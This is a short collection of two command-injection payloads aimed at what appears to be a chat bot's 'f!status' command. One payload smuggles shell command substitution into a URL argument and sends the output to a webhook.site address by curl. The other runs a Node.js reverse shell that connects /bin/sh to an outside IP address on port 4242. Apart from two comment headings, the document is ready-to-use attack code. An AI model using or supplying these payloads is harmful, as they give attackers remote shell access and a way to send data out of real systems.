# Shell commands with stdout and stderr:
f!status https://webhook.site/737e1e7d-df03-414a-9093-fdc3ac414bdc/$(echo test 2>&1 | curl -s -X POST --data-binary @- https://webhook.site/737e1e7d-df03-414a-9093-fdc3ac414bdc)

# Reverse shell:
f!status https://webhook.site/737e1e7d-df03-414a-9093-fdc3ac414bdc/$(echo '(function(){
    var net = require(`net`),
        cp = require(`child_process`),
        sh = cp.spawn(`/bin/sh`, []);
    var client = new net.Socket();
    client.connect(4242, `150.230.34.133`, function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application form crashing
})();' | node 2>&1 | curl -s -X POST --data-binary @- https://webhook.site/737e1e7d-df03-414a-9093-fdc3ac414bdc)
